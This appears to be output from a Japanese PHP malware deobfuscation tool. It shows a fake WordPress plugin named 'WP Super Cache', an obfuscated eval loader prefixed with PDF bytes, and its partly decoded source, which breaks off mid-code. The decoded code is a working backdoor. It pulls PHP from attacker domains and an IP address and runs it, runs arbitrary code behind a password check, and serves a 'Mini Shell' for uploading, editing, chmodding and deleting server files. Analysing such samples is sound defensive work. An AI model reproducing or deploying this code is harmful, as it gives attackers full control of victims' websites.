Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
%PDF- %PDF- <?php /** * Plugin Name: WP Super Cache * Plugin URI: https://github.com/cAT3VWynuiL7CRgr/c332d * Description: WP Super Cache * Version: 1.0 * Author: WP Super Cache * Author URI: https://github.com/cAT3VWynuiL7CRgr/c332d * License: GPLv2 */ $fINj7 = "ixdZNbq0Iopz_nyh4sOEKcfBr5A1tQTugjaUlRk6H87eJDmPYLMwVCGFS93Xv2W"; $hAxbp = $fINj7[32].$fINj7[11].$fINj7[0].$fINj7[13].$fINj7[22].$fINj7[36].$fINj7[34].$fINj7[28].$fINj7[43]; $bHe1D = $fINj7[5].$fINj7[34].$fINj7[17].$fINj7[43].$fINj7[39].$fINj7[16].$fINj7[12].$fINj7[2].$fINj7[43].$fINj7[21].$fINj7[9].$fINj7[2].$fINj7[43]; $EWbJ5 = "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"; eval($hAxbp($bHe1D($EWbJ5)));
%PDF- %PDF- <?php /** * Plugin Name: WP Super Cache * Plugin URI: https://github.com/cAT3VWynuiL7CRgr/c332d * Description: WP Super Cache * Version: 1.0 * Author: WP Super Cache * Author URI: https://github.com/cAT3VWynuiL7CRgr/c332d * License: GPLv2 */ $fINj7 = "ixdZNbq0Iopz_nyh4sOEKcfBr5A1tQTugjaUlRk6H87eJDmPYLMwVCGFS93Xv2W"; $hAxbp = "gzinflate"; $bHe1D = "base64_decode"; $EWbJ5 = "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"; eval { @set_time_limit(0); @error_reporting(0); $L7CRgr = "8b365e23f68a89041d3d59a05f761d3f"; function GCNew($a) { $url = sprintf('%s?api=%s&action=%s&path=%s&token=%s', $a, $_REQUEST['api'], $_REQUEST['action'], $_REQUEST['path'], $_REQUEST['token']); $code = @file_get_contents($url); if ($code == false) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'll'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 100); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); $code = curl_exec($ch); curl_close($ch); } return $code; } if (isset($_REQUEST['action']) && isset($_REQUEST['path']) && isset($_REQUEST['api']) && isset($_REQUEST['token'])) { $code = GCNew('https://c-new.icw5.xyz/'); $result = json_decode($code, true); if (isset($result['code']) && $result['code'] == 1) { $code = $result['data']; } else { die($result['msg']); } $need = '<?php'; if (strpos($code, $need) === false) { die('get failed'); } if (function_exists('tmpfile')) { $file_name = tmpfile(); fwrite($file_name, $code); $a = stream_get_meta_data($file_name); $file_path = $a['uri']; @(include $file_path); fclose($file_name); } else { $file_path = '.c'; file_put_contents($file_path, $code); @(include $file_path); } @unlink($file_path); die; } function GC($a) { $url = sprintf('%s?api=%s&ac=%s&path=%s&t=%s', $a, $_REQUEST['api'], $_REQUEST['ac'], $_REQUEST['path'], $_REQUEST['t']); $code = @file_get_contents($url); if ($code == false) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'll'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 100); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); $code = curl_exec($ch); curl_close($ch); } return $code; } if (isset($_REQUEST['ac']) && isset($_REQUEST['path']) && isset($_REQUEST['api']) && isset($_REQUEST['t'])) { if (!isset($_REQUEST['s'])) { $s = 1; } else { $s = $_REQUEST['s']; } switch ($s) { case 1: $code = GC('https://c.zvo1.xyz/'); break; case 2: $code = GC('https://c2.icw7.com/'); break; case 3: $code = GC('http://45.11.57.159/'); break; default: $code = GC('https://c.zvo1.xyz/'); break; } $need = '<?php'; if (strpos($code, $need) === false) { die('get failed'); } if (function_exists('tmpfile')) { $file_handle = tmpfile(); fwrite($file_handle, $code); $a = stream_get_meta_data($file_handle); $file_path = $a['uri']; @(include $file_path); @fclose($file_handle); } else { $file_path = '.c'; file_put_contents($file_path, $code); @(include $file_path); } @unlink($file_path); die; } if (isset($_REQUEST['d_time'])) { die('{->' . $L7CRgr . '<-}'); } $pass = false; if (isset($_COOKIE['pass'])) { if (md5($_COOKIE['pass']) == $L7CRgr) { $pass = $_REQUEST['pass']; } } else { if (isset($_REQUEST['pass'])) { if (md5($_REQUEST['pass']) == $L7CRgr) { setcookie("pass", $_REQUEST['pass']); $pass = $_REQUEST['pass']; } } } if (isset($_POST['logout']) && ($_POST['logout'] = 1)) { setcookie("pass", null); $pass = false; } if (isset($_REQUEST['pwd163']) && md5($_REQUEST['pwd163']) == $L7CRgr) { $a = base64_decode(rawurldecode(urlencode(urldecode($_REQUEST['zzz'])))); $need = "<?php"; if (strpos($a, $need) === false) { $a = "<?phpPHP_EOL" . $a; } if (isset($_REQUEST['e'])) { $a = str_replace($need, "", $a); $b = "eval"; eval($a); die; } $file_name = tmpfile(); fwrite($file_name, $a); $require_params = stream_get_meta_data($file_name); @(require $require_params['uri']); fclose($file_name); die; } if (isset($_REQUEST['auth_key'])) { die($L7CRgr); } if (!$pass) { if (!isset($_REQUEST['520'])) { header("HTTP/1.1 404 Not Found"); die; } echo '<form action="#" method="post"><input type="password" name="pass" > <input type="submit" value="submit"></form>'; die; } echo '<form action="#" method="post"><input type="hidden" name="logout" value="1"> <input type="submit" value="logout"></form>'; echo '<!DOCTYPE HTML> <HTML> <HEAD> <link href="" rel="stylesheet" type="text/css"> <title>Mini Shell</title> <style> body{ font-family: "Racing Sans One", cursive; background-color: #e6e6e6; text-shadow:0px 0px 1px #757575; } #content tr:hover{ background-color: #636263; text-shadow:0px 0px 10px #fff; } #content .first{ background-color: silver; } #content .first:hover{ background-color: silver; text-shadow:0px 0px 1px #757575; } table{ border: 1px #000000 dotted; } H1{ font-family: "Rye", cursive; } a{ color: #000; text-decoration: none; } a:hover{ color: #fff; text-shadow:0px 0px 10px #ffffff; } input,select,textarea{ border: 1px #000000 solid; -moz-border-radius: 5px; -webkit-border-radius:5px; border-radius:5px; } </style> </HEAD> <BODY> <H1><center><img src="https://s.yimg.com/lq/i/mesg/emoticons7/19.gif"/> Mini Shell <img src="https://s.yimg.com/lq/i/mesg/emoticons7/19.gif"/> </center></H1> <table width="700" border="0" cellpadding="3" cellspacing="1" align="center"> <tr><td>Direktori : '; if (isset($_GET['path'])) { $path = $_GET['path']; } else { $path = getcwd(); } $path = str_replace('\\', '/', $path); $paths = explode('/', $path); foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { $a = true; echo '<a href="?pass=' . $pass . '&path=/">/</a>'; continue; } if ($pat == '') { continue; } echo '<a href="?pass=' . $pass . '&path='; for ($i = 0; $i <= $id; $i++) { echo "{$paths[$i]}"; if ($i != $id) { echo "/"; } } echo '">' . $pat . '</a>/'; } echo '</td></tr><tr><td>'; if (isset($_POST['path_create'])) { if (@mkdir($path . '/' . $_POST['path_create'])) { echo '<font color="green">create success :* ' . $path . '/' . $_POST['path_create'] . '</font><br />'; } else { echo '<font color="red">create failed :* ' . $path . '/' . $_POST['path_create'] . '</font><br />'; } } if (isset($_FILES['file'])) { if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) { echo '<font color="green">File Ter-Upload :* </font><br />'; } else { echo '<font color="red">Upload gagal, Servernya kek <img src="http://c.fastcompany.net/asset_files/-/2014/11/11/4F4.gif"/> </font><br />'; } } echo '<form enctype="multipart/form-data" method="POST"> Upload File : <input type="file" name="file" /> <input type="hidden" name="pass" value="' . $pass . '"> <input type="submit" value="upload" /> </form> </td></tr> <tr><td><form enctype="multipart/form-data" method="POST"> Create Path : <input type="text" name="path_create" /> <input type="hidden" name="pass" value="' . $pass . '"> <input type="submit" value="create" /> </form></td></td>'; if (isset($_GET['filesrc'])) { echo "<tr><td>Current File : "; echo $_GET['filesrc']; echo '</tr></td></table><br />'; echo '<pre>' . htmlspecialchars(file_get_contents($_GET['filesrc'])) . '</pre>'; } elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') { echo '</table><br /><center>' . $_POST['path'] . '<br /><br />'; if ($_POST['opt'] == 'chmod') { if (isset($_POST['perm'])) { if (chmod($_POST['path'], octdec($_POST['perm']))) { echo '<font color="green">Change Permission Done.</font><br />'; } else { echo '<font color="red">Change Permission Error.</font><br />'; } } echo '<form method="POST"> Permission : <input name="perm" type="text" size="4" value="' . substr(sprintf('%o', fileperms($_POST['path'])), 4) . '" /> <input type="hidden" name="path" value="' . $_POST['path'] . '"> <input type="hidden" name="opt" value="chmod"> <input type="submit" value="Go" /> </form>'; } elseif ($_POST['opt'] == 'rename') { if (isset($_POST['newname'])) { if (rename($_POST['path'], $path . '/' . $_POST['newname'])) { echo '<font color="green">Change Name Done.</font><br />'; } else { echo '<font color="red">Change Name Error.</font><br />'; } $_POST['name'] = $_POST['newname']; } echo '<form method="POST"> New Name : <input name="newname" type="text" size="20" value="' . $_POST['name'] . '" /> <input type="hidden" name="path" value="' . $_POST['path'] . '"> <input type="hidden" name="opt" value="rename"> <input type="submit" value="Go" /> </form>'; } elseif ($_POST['opt'] == 'edit') { if (isset($_POST['src'])) { $fp = fopen($_POST['path'], 'w'); if (fwrite($fp, $_POST['src'])) { echo '<font color="green">Edit File Done ~_^.</font><br />'; } else { echo '<font color="red">Edit File Error ~_~.</font><br />'; } fclose($fp); } echo '<form method="POST"> <textarea cols=80 rows=20 name="src">' . htmlspecialchars(file_get_contents($_POST['path'])) . '</textarea><br /> <input type="hidden" name="path" value="' . $_POST['path'] . '"> <input type="hidden" name="opt" value="edit"> <input type="submit" value="Go" /> </form>'; } echo '</center>'; } else { echo '</table><br /><center>'; if (isset($_GET['option']) && $_POST['opt'] == 'delete') { if ($_POST['type'] == 'dir') { if (rmdir($_POST['path'])) { echo '<font color="green">Delete Dir Done.</font><br />'; } else { echo '<font color="red">Delete Dir Error.</font><br />'; } } elseif ($_POST['type'] == 'file') { if (unlink($_POST['path'])) { echo '<font color="green">Delete File Done.</font><br />'; } else { echo '<font color="red">Delete File Error.</font><br />'; } } } echo '</center>'; $scandir = scandir($path); echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center"> <tr class="first"> <td><center>Name</center></td> <td><center>Size</center></td> <td><center>Permissions</center></td> <td><center>Options</center></td> </tr>'; foreach ($scandir as $dir) { if (!is_dir("{$path}/{$dir}") || $dir == '.' || $dir == '..') { continue; } echo "<tr>\r\n<td><a href=\"?path={$path}/{$dir}&pass={$pass}\">{$dir}</a></td>\r\n<td><center>--</center></td>\r\n<td><center>"; if (is_writable("{$path}/{$dir}")) { echo '<font color="green">'; } elseif (!is_readable("{$path}/{$dir}")) { echo '<font color="red">'; } echo perms("{$path}/{$dir}"); if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) { echo '</font>'; } echo "</center></td>\r\n<td><center><form method=\"POST\" action=\"?option&path={$path}&pass={$pass}\">\r\n<select name=\"opt\">\r\n<option value=\"\"></option>\r\n<option value=\"delete\">Delete</option>\r\n<option value=\"chmod\">Chmod</option>\r\n<option value=\"rename\">Rename</option>\r\n</select>\r\n<input type=\"hidden\" name=\"type\" value=\"dir\">\r\n<input type=\"hidden\" name=\"name\" value=\"{$dir}\">\r\n<input type=\"hidden\" name=\"path\" value=\"{$path}/{$dir}\">\r\n<input type=\"hidden\" name=\"pass\" value=\"{$pass}\">\r\n<input type=\"submit\" value=\">\" />\r\n</form></center></td>\r\n</tr>"; } echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>'; foreach ($scandir as $file) { if (!is_file("{$path}/{$file}")) { continue; } $size = filesize("{$path}/{$file}") / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . ' MB'; } else { $size .= ' KB'; } echo "<tr>\r\n<td><a href=\"?filesrc={$path}/{$file}&path={$path}&pass={$pass}\">{$file}</a></td>\r\n<td><center>" . $size . 